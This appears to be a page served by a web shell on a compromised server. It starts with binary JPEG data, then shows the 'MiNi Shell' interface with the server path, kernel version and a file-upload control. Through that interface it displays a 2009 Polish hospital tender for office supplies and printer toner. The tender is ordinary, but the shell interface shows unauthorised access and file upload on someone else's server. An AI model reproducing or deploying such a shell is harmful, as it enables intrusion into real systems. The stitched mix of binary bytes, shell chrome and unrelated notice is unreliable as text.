JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/179503-N-2009.html

<p class="kh_header"><b>Puszczykowo: Dostawa artykułów biurowych oraz materiałów eksploatacyjnych do drukarek i faksów</b><br>
<b>Numer ogłoszenia: 179503 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Niepubliczny Zakład Opieki Zdrowotnej "Szpital w Puszczykowie im. prof. Stefana Tytusa Dąbrowskiego" sp. z o.o , ul. Kraszewskiego 11, 62-041 Puszczykowo, woj. brak, tel. 0-61 8984093, 8984000, faks 0-61 8133391.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna, o której mowa w art. 3, ust. 1 pkt 3) ustawy Prawo zamówień publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych oraz materiałów eksploatacyjnych do drukarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów biurowych oraz materiałów eksploatacyjnych do urządzeń drukujących i faksów.Termin dostawy zamówienia nie może być dłuższy niż 3 dni kalendarzowe od chwili zgłoszenia.
Zamawiany asortyment posiada minimum półroczny termin ważności liczony od daty dostawy.
Przedmiot zamówienia winien być przekazany do magazynu Zamawiającego w godzinach otwarcia tj. od 7.30 do 1400.na koszt Wykonawcy.
Wymagania stawiane Wykonawcy:
Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia;
Wykonawca odpowiedzialny będzie za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia;
Wykonawca zobowiązany jest do należytej staranności przy wykonaniu zamówienia;
Zamawiający  dopuszcza możliwość składania ofert częściowych z podziałem na dwie części
Część I  - artykuły biurowe
Cienkopis mix kolorów czarny, czerwony, niebieski, zielony szt	500,Folia do fax-u typ Panasonic KX -FA52X	szt	20,Folia przezroczysta A4 do laminowania 75, opakowanie a 100 szt	opakowanie	12,Gumka do mazania	szt	20,Klej biurowy sztyft nie mniej niż 20g	szt	100,Klej biurowy tubka nie mniej niż 40g	szt	50
Koperta biała B4 250 x 353 mm samoklejąca 250 szt opak	opakowanie	10,Koperta brązowa B4 250 x 353 mm samoklejąca 250 sztopak	opakowanie	40,Koperta biała B5 176 x 250 mm samoklejąca 250 szt opak.	opakowanie	10,Koperta biała C6 114 x 162 mm samoklejąca 500 szt opak.	opakowanie	5,Koperta do RTG szara 370 x 450 mm cięta z dłuższego boku	szt	7500,Korektor w pisaku	szt	100
Korektor w taśmie	szt	10,Kostka biurowa klejona 82mm x 84mm kolor biały	szt	60,Kostka bloczek samoprzylepny 76 x 76 mm	szt	100
Koszulka z klapką A4 10szt  opakowanie	opakowanie	10,Linijka 30 cm	szt	20
Marker do tablic suchościeralnych czarny	szt	30
Notatnik A4 96 kart. twarda oprawa	szt	40,Notatnik A4 96 kart. miękka oprawa	szt	50,Nożyczki długość ostrza 12 cm.	szt	19,Obwoluta na dokumenty A4 opak. po 100 szt	opakowanie	240,Obwoluta na dokumenty z klapką opak.po 100 szt	szt	10,Ołówek 	szt	80,Papier  do faxu termiczny w rolce szer. min. 210 mm, dł. 30m 55g m2	szt	30,Papier komputerowy składanka 240x12 - 2 warstwowy	opakowanie	10,Papier komputerowy składanka 240x12 - 1 warstwowy	opakowanie	12,Papier ksero A3 biały, 80g m2, ryza 500 szt	szt	50
Papier ksero A4 biały, 80g m2, ryza 500 szt	szt	1900,Pisak mix kolorów czarny, czerwony, niebieski, zielony	szt	400,Pisak wodoodporny cienki czarny do pisania po szkle	szt	350,Pisak wodoodporny gruby czarny do pisania po szkle	szt	320,Pisak- zakreślacz  - mix kolorów pomarańczowy, żółty zielony	szt	100,Płyta CD-RW	szt	300,Segregator 7 cm - kolor ciemnoniebieski oprawa twarda z mechanizmem dźwigniowym	szt	470,Segregator 4,5 cm- kolor ciemnoniebieski z mechan. Dźwigniowym	szt	200,Skoroszyt papierowy A4	szt	60,Skoroszyt plastikowy miękkie okładki A4 	szt	450,Skoroszyt plastikowy niebieski do wpięcia w segregator z zawieszką	szt	373,Skoroszyt plastikowy z twardą okładką	szt	200,Spinacz duży 50 mm 100 szt w opakowaniu 	opakowanie	140,Spinacz mały 28 mm 100 szt w opakowaniu	opakowanie	230
Taśma gęsia skórka 	szt	75,Taśma samoprzylepna 2cm	szt	163
Teczka A4 wiązana papierowa	szt	220,Teczka A4 wiązana plastikowa	szt	220,Teczka papierowa z gumką	szt	260,Zeszyt 32k kratka A5	szt	30
Zeszyt 60k A5 kratka	szt	75,Zeszyt 80 kart. A5	szt	120,Zeszyt 96k A5 kratka twarda okładka	szt	10,Zszywki 24 6 1000 szt	opak.	200
Część II - Materiały eksploatacyjne do drukarek Atrament do drukarki Canon CLI 8B	szt	3
Atrament do drukarki Canon Pixma IP 4200  PGI -5B	szt	4
Atrament do drukarki HP 15	szt	28
Atrament do drukarki HP 27	szt	24
Atrament do drukarki HP 336	szt	12
Atrament do drukarki HP 56	szt	12
Atrament do drukarki HP17	szt	3
Atrament do drukarki HP28	szt	4
Taśma do drukarki OKI ML 320	szt	6
Taśma do drukarki STAR LC15PL	szt	2
Taśma do drukarki EPSON LX 300	szt	2
Taśma do drukarki Panasonic KXP1150	szt	3
Toner do drukarki Brother TN-2000	szt	58
Toner do drukarki Brother TN3130	szt	7
Toner do drukarki HP 06A	szt	3
Toner do drukarki HP 12A	szt	40
Toner do drukarki HP 13X	szt	1
Toner do drukarki HP 15A	szt	1
Toner do drukarki HP 49X	szt	9
Toner do drukarki HP Q6000A	szt	10
Toner do drukarki Konica - Minolta P1710-5600-02	szt	6
Toner do drukarki Konica -Minolta P1710-5890-04	szt	3
Toner do drukarki Konica -Minolta P1710-5890-05	szt	3
Toner do drukarki Konica -Minolta P1710-5890-06	szt	3
Toner do drukarki Konica -Minolta P1710-5890-07	szt	3
Toner do drukarki OKI PAGE 09004078	szt	4
Toner do urządzenia HP Q6001A	szt	4
Toner do urządzenia HP Q6002A	szt	4
Toner do urządzenia HP Q6003A	szt	4
Toner do urządzenia LEXMARK 12A8400	szt	11
Toner do urządzenia SAMSUNG ML-1710	szt	1.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.12.51.20-8, 30.19.21.12-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; tj. wykonali co najmniej 3 dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia publicznego; za dostawy tego samego rodzaju Zamawiający rozumie:

a)	dla części 1 każdą dostawę artykułów biurowych o wartości co najmniej 30.000,00 zł każda z tych dostaw;
b)	dla części 2 każdą dostawę materiałów eksploatacyjnych o wartości co najmniej 50.000,00 zł każda z tych dostaw;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów wg formuły spełnia - nie spełnia. 
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca składa następujące dokumenty:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3)	oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 ustawy Prawo zamówień publicznych - zawarte w Załączniku nr 3 do niniejszej SIWZ.

4)	wykaz wykonanych co najmniej 3 dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia publicznego, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców; za dostawy tego samego rodzaju Zamawiający rozumie:

a)	dla części 1 każdą dostawę artykułów biurowych o wartości co najmniej 30.000,00 zł każda z tych dostaw;
b)	dla części 2 każdą dostawę materiałów eksploatacyjnych o wartości co najmniej 50.000,00 zł każda z tych dostaw;
		z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie.

 2.  Wykonawca mający siedzibę lub zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1)	w pkt. 1.1), 1.2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

Dokumenty, o których mowa w pkt.  2.1) lit. a), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokumenty, o których mowa w pkt.  2.1) lit. b, powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenie osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z zachowaniem  terminów określonych powyżej.

3. W celu potwierdzenia, że oferowane dostawy, odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca składa dokumenty potwierdzające zgodność oferowanych dostaw z wymaganiami Zamawiającego.

Dokumenty, o których mowa w punkcie .1. do 3. mogą być złożone w formie oryginałów lub kopii poświadczonej za zgodność przez osobę - osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem. Oświadczenia, o jakim mowa w punkcie 1.3 siwz składa się w oryginale..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalwpuszczykowie.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Niepubliczny Zakład Opieki Zdrowotnej 
Szpital w Puszczykowie im. prof. Stefana Tytusa Dąbrowskiego Sp. z o.o.
ul. Kraszewskiego 11
62-041 Puszczykowo
Zamówienia Publiczne pok. 114.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 10:00, miejsce: Niepubliczny Zakład Opieki Zdrowotnej 
Szpital w Puszczykowie im. prof. Stefana Tytusa Dąbrowskiego Sp. z o.o.
ul. Kraszewskiego 11
62-041 Puszczykowo
Kancelaria Szpitala.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cienkopis mix kolorów czarny, czerwony, niebieski, zielony szt	500,Folia do fax-u typ Panasonic KX -FA52X	szt	20,Folia przezroczysta A4 do laminowania 75, opakowanie a 100 szt	opakowanie	12,Gumka do mazania	szt	20,Klej biurowy sztyft nie mniej niż 20g	szt	100,Klej biurowy tubka nie mniej niż 40g	szt	50
Koperta biała B4 250 x 353 mm samoklejąca 250 szt opak	opakowanie	10,Koperta brązowa B4 250 x 353 mm samoklejąca 250 sztopak	opakowanie	40,Koperta biała B5 176 x 250 mm samoklejąca 250 szt opak.	opakowanie	10,Koperta biała C6 114 x 162 mm samoklejąca 500 szt opak.	opakowanie	5,Koperta do RTG szara 370 x 450 mm cięta z dłuższego boku	szt	7500,Korektor w pisaku	szt	100
Korektor w taśmie	szt	10,Kostka biurowa klejona 82mm x 84mm kolor biały	szt	60,Kostka bloczek samoprzylepny 76 x 76 mm	szt	100
Koszulka z klapką A4 10szt  opakowanie	opakowanie	10,Linijka 30 cm	szt	20
Marker do tablic suchościeralnych czarny	szt	30
Notatnik A4 96 kart. twarda oprawa	szt	40,Notatnik A4 96 kart. miękka oprawa	szt	50,Nożyczki długość ostrza 12 cm.	szt	19,Obwoluta na dokumenty A4 opak. po 100 szt	opakowanie	240,Obwoluta na dokumenty z klapką opak.po 100 szt	szt	10,Ołówek 	szt	80,Papier  do faxu termiczny w rolce szer. min. 210 mm, dł. 30m 55g m2	szt	30,Papier komputerowy składanka 240x12 - 2 warstwowy	opakowanie	10,Papier komputerowy składanka 240x12 - 1 warstwowy	opakowanie	12,Papier ksero A3 biały, 80g m2, ryza 500 szt	szt	50
Papier ksero A4 biały, 80g m2, ryza 500 szt	szt	1900,Pisak mix kolorów czarny, czerwony, niebieski, zielony	szt	400,Pisak wodoodporny cienki czarny do pisania po szkle	szt	350,Pisak wodoodporny gruby czarny do pisania po szkle	szt	320,Pisak- zakreślacz  - mix kolorów pomarańczowy, żółty zielony	szt	100,Płyta CD-RW	szt	300,Segregator 7 cm - kolor ciemnoniebieski oprawa twarda z mechanizmem dźwigniowym	szt	470,Segregator 4,5 cm- kolor ciemnoniebieski z mechan. Dźwigniowym	szt	200,Skoroszyt papierowy A4	szt	60,Skoroszyt plastikowy miękkie okładki A4 	szt	450,Skoroszyt plastikowy niebieski do wpięcia w segregator z zawieszką	szt	373,Skoroszyt plastikowy z twardą okładką	szt	200,Spinacz duży 50 mm 100 szt w opakowaniu 	opakowanie	140,Spinacz mały 28 mm 100 szt w opakowaniu	opakowanie	230
Taśma gęsia skórka 	szt	75,Taśma samoprzylepna 2cm	szt	163
Teczka A4 wiązana papierowa	szt	220,Teczka A4 wiązana plastikowa	szt	220,Teczka papierowa z gumką	szt	260,Zeszyt 32k kratka A5	szt	30
Zeszyt 60k A5 kratka	szt	75,Zeszyt 80 kart. A5	szt	120,Zeszyt 96k A5 kratka twarda okładka	szt	10,Zszywki 24 6 1000 szt	opak.	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały eksploatacyjne do drukarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Atrament do drukarki Canon CLI 8B	szt	3
Atrament do drukarki Canon Pixma IP 4200  PGI -5B	szt	4
Atrament do drukarki HP 15	szt	28
Atrament do drukarki HP 27	szt	24
Atrament do drukarki HP 336	szt	12
Atrament do drukarki HP 56	szt	12
Atrament do drukarki HP17	szt	3
Atrament do drukarki HP28	szt	4
Taśma do drukarki OKI ML 320	szt	6
Taśma do drukarki STAR LC15PL	szt	2
Taśma do drukarki EPSON LX 300	szt	2
Taśma do drukarki Panasonic KXP1150	szt	3
Toner do drukarki Brother TN-2000	szt	58
Toner do drukarki Brother TN3130	szt	7
Toner do drukarki HP 06A	szt	3
Toner do drukarki HP 12A	szt	40
Toner do drukarki HP 13X	szt	1
Toner do drukarki HP 15A	szt	1
Toner do drukarki HP 49X	szt	9
Toner do drukarki HP Q6000A	szt	10
Toner do drukarki Konica - Minolta P1710-5600-02	szt	6
Toner do drukarki Konica -Minolta P1710-5890-04	szt	3
Toner do drukarki Konica -Minolta P1710-5890-05	szt	3
Toner do drukarki Konica -Minolta P1710-5890-06	szt	3
Toner do drukarki Konica -Minolta P1710-5890-07	szt	3
Toner do drukarki OKI PAGE 09004078	szt	4
Toner do urządzenia HP Q6001A	szt	4
Toner do urządzenia HP Q6002A	szt	4
Toner do urządzenia HP Q6003A	szt	4
Toner do urządzenia LEXMARK 12A8400	szt	11
Toner do urządzenia SAMSUNG ML-1710	szt	1
Zamawiający wymaga , ażeby asortyment w części II był oryginalny tj. zgodny z zaleceniami producenta.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.19.21.12-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com